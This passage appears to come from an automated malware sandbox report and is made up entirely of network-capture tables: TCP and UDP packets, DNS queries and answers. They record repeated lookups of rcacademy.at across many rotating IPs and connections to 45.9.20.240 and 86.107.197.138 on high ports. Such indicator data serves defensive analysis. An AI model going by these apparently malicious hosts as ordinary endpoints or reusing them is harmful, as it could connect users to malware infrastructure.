                                                                                                                                  Dec 18, 2021 15:32:54.508397102 CET8049890211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.139612913 CET8049890211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.139653921 CET8049890211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.139787912 CET4989080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:55.199671030 CET4989080192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:55.317210913 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:55.484869003 CET8049890211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.588664055 CET8049891218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.588768005 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:55.588864088 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:55.588871956 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:55.861116886 CET8049891218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.463308096 CET8049891218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.463365078 CET8049891218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.463526011 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:56.463587046 CET4989180192.168.2.6218.38.155.210
                                                                                                                                  Dec 18, 2021 15:32:56.564531088 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:56.735100031 CET8049891218.38.155.210192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.806859970 CET8049892211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.806981087 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:56.807126999 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:56.807151079 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:57.054968119 CET8049892211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:57.694097996 CET8049892211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:57.694128990 CET8049892211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:57.694268942 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:57.735074043 CET4989280192.168.2.6211.59.14.90
                                                                                                                                  Dec 18, 2021 15:32:57.828839064 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:57.977927923 CET8049892211.59.14.90192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:58.083913088 CET8049893222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:58.084048033 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:58.084212065 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:58.084919930 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:58.338752031 CET8049893222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.045602083 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:59.107181072 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.107286930 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:59.117367029 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:59.179508924 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.222249985 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:59.244699955 CET8049893222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.244726896 CET8049893222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.244856119 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:59.245084047 CET4989380192.168.2.6222.232.238.243
                                                                                                                                  Dec 18, 2021 15:32:59.282128096 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.498225927 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:32:59.498811007 CET8049893222.232.238.243192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.767642975 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:59.791729927 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.797327995 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.798105001 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:32:59.832216978 CET381334986586.107.197.138192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:59.841217041 CET4986538133192.168.2.686.107.197.138
                                                                                                                                  Dec 18, 2021 15:33:04.356312990 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:04.418001890 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:04.418032885 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:04.418052912 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:04.418075085 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:04.418131113 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:04.418170929 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:04.477530003 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:04.608005047 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:04.927042007 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:04.987520933 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.035969973 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.095695019 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.097594976 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.157265902 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.232131958 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.291866064 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.293817997 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.353486061 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.498697996 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.681225061 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.740930080 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.743845940 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.803781986 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.837158918 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.896600962 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.896622896 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.896672010 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.896747112 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:05.946945906 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.956568003 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.956593990 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.956928015 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:05.998764992 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.085901976 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.150034904 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.202564955 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.262950897 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.266370058 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.327384949 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.340590000 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.400316954 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.400360107 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.400794029 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.463680983 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.464683056 CET4989446257192.168.2.645.9.20.240
                                                                                                                                  Dec 18, 2021 15:33:06.527393103 CET462574989445.9.20.240192.168.2.6
                                                                                                                                  Dec 18, 2021 15:33:06.537436962 CET4989446257192.168.2.645.9.20.240

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 18, 2021 15:31:41.738209963 CET6134653192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET53613468.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:43.339395046 CET5177453192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET53517748.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:44.963063002 CET5602353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:45.228877068 CET53560238.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:46.680736065 CET5838453192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:46.758775949 CET53583848.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:47.874171019 CET6026153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:47.893105984 CET53602618.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:49.425864935 CET5833653192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:49.444673061 CET53583368.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:51.000307083 CET5378153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:51.018965006 CET53537818.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:52.547163010 CET5406453192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:52.563851118 CET53540648.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:53.996268988 CET5281153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:54.079209089 CET53528118.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:55.092200041 CET6374553192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:55.111563921 CET53637458.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:56.372029066 CET6330753192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:56.923805952 CET53633078.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:57.818836927 CET5001053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:57.837757111 CET53500108.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:31:58.774336100 CET6381653192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:31:58.790762901 CET53638168.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:00.364804029 CET6220853192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:00.383413076 CET53622088.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:03.723253965 CET5757453192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:03.740010023 CET53575748.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:06.889256001 CET5662853192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:06.906272888 CET53566288.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:08.345504999 CET6077853192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:08.364253998 CET53607788.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:09.872443914 CET5379953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:09.889686108 CET53537998.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:11.271330118 CET5468353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:11.290132999 CET53546838.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:12.721194029 CET5932953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:12.752821922 CET53593298.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:14.003084898 CET6402153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:14.026331902 CET53640218.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:15.299896955 CET5612953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:15.318825960 CET53561298.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:16.540584087 CET5817753192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:16.557167053 CET53581778.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:17.977725029 CET5406953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:17.994652987 CET53540698.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:19.688455105 CET6117853192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:19.705799103 CET53611788.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:21.000931978 CET5701753192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:21.020435095 CET53570178.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:22.404835939 CET5632753192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:22.421538115 CET53563278.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:23.141659021 CET5024353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:23.158224106 CET53502438.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:24.429507017 CET6124953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:24.446007013 CET53612498.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:25.728866100 CET6525253192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:25.747704983 CET53652528.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:26.895683050 CET6436753192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:26.914594889 CET53643678.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:31.247369051 CET5506653192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:31.267066002 CET53550668.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:32.789206028 CET6021153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:32.810909033 CET53602118.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:34.409126043 CET5657053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:34.427680969 CET53565708.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:35.676341057 CET5845453192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:35.694947004 CET53584548.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:37.312702894 CET5518053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:37.331425905 CET53551808.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:39.424990892 CET5872153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:39.443697929 CET53587218.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:40.621578932 CET5769153192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:40.765645027 CET53576918.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:42.060592890 CET5294353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:42.372224092 CET53529438.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:43.285378933 CET5948953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:43.304234028 CET53594898.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:44.751882076 CET6402253192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:44.771049976 CET53640228.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:48.316963911 CET5719353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:48.335971117 CET53571938.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:49.056626081 CET5024853192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:49.075349092 CET53502488.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:50.499649048 CET6441353192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:50.518537998 CET53644138.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:51.243432045 CET6042953192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:51.261847973 CET53604298.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:52.591519117 CET6034553192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:52.610465050 CET53603458.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:53.914556026 CET5873053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:53.935749054 CET53587308.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:55.297151089 CET5383053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:55.315965891 CET53538308.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:56.539882898 CET5722653192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:56.559046984 CET53572268.8.8.8192.168.2.6
                                                                                                                                  Dec 18, 2021 15:32:57.809582949 CET5788053192.168.2.68.8.8.8
                                                                                                                                  Dec 18, 2021 15:32:57.828247070 CET53578808.8.8.8192.168.2.6

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Dec 18, 2021 15:31:41.738209963 CET192.168.2.68.8.8.80xeb59Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.339395046 CET192.168.2.68.8.8.80x5dc6Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:44.963063002 CET192.168.2.68.8.8.80x585eStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:46.680736065 CET192.168.2.68.8.8.80xc892Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:47.874171019 CET192.168.2.68.8.8.80xee2eStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:49.425864935 CET192.168.2.68.8.8.80xf6b9Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:51.000307083 CET192.168.2.68.8.8.80xf0ffStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:52.547163010 CET192.168.2.68.8.8.80x417cStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:53.996268988 CET192.168.2.68.8.8.80x242Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:55.092200041 CET192.168.2.68.8.8.80xae03Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:56.372029066 CET192.168.2.68.8.8.80x9e40Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:57.818836927 CET192.168.2.68.8.8.80x7a74Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:58.774336100 CET192.168.2.68.8.8.80xc9f5Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:00.364804029 CET192.168.2.68.8.8.80xc26fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:03.723253965 CET192.168.2.68.8.8.80x7dfbStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:06.889256001 CET192.168.2.68.8.8.80xadfcStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:08.345504999 CET192.168.2.68.8.8.80xedbbStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:09.872443914 CET192.168.2.68.8.8.80xc1e3Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:11.271330118 CET192.168.2.68.8.8.80xbe6Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:12.721194029 CET192.168.2.68.8.8.80x23caStandard query (0)bastinscustomfab.comA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:14.003084898 CET192.168.2.68.8.8.80xb47dStandard query (0)www.bastinscustomfab.comA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:15.299896955 CET192.168.2.68.8.8.80xcbf3Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:16.540584087 CET192.168.2.68.8.8.80x1ec2Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:17.977725029 CET192.168.2.68.8.8.80x276aStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:19.688455105 CET192.168.2.68.8.8.80x102bStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:21.000931978 CET192.168.2.68.8.8.80x7f6cStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:22.404835939 CET192.168.2.68.8.8.80xfa41Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:23.141659021 CET192.168.2.68.8.8.80x9738Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:24.429507017 CET192.168.2.68.8.8.80xa49aStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:25.728866100 CET192.168.2.68.8.8.80x7a75Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:26.895683050 CET192.168.2.68.8.8.80x95b6Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:31.247369051 CET192.168.2.68.8.8.80x87d9Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:32.789206028 CET192.168.2.68.8.8.80x9913Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:34.409126043 CET192.168.2.68.8.8.80xcf6bStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:35.676341057 CET192.168.2.68.8.8.80x1edeStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:37.312702894 CET192.168.2.68.8.8.80x31a1Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:39.424990892 CET192.168.2.68.8.8.80x2929Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:40.621578932 CET192.168.2.68.8.8.80x8613Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:42.060592890 CET192.168.2.68.8.8.80xd139Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:43.285378933 CET192.168.2.68.8.8.80x7edbStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:44.751882076 CET192.168.2.68.8.8.80x1eedStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:48.316963911 CET192.168.2.68.8.8.80x9e67Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:49.056626081 CET192.168.2.68.8.8.80x1ff0Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:50.499649048 CET192.168.2.68.8.8.80xa430Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:51.243432045 CET192.168.2.68.8.8.80x1522Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:52.591519117 CET192.168.2.68.8.8.80x5788Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:53.914556026 CET192.168.2.68.8.8.80xc53dStandard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:55.297151089 CET192.168.2.68.8.8.80x1e30Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:56.539882898 CET192.168.2.68.8.8.80x41a8Standard query (0)rcacademy.atA (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:32:57.809582949 CET192.168.2.68.8.8.80x6fe8Standard query (0)rcacademy.atA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at187.232.246.220A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at218.38.155.210A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at190.117.75.91A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at187.156.56.69A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at148.0.74.229A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:41.947884083 CET8.8.8.8192.168.2.60xeb59No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at222.232.238.243A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at61.255.185.201A (IP address)IN (0x0001)
                                                                                                                                  Dec 18, 2021 15:31:43.485003948 CET8.8.8.8192.168.2.60x5dc6No error (0)rcacademy.at211.59.14.90A (IP address)IN (0x0001)
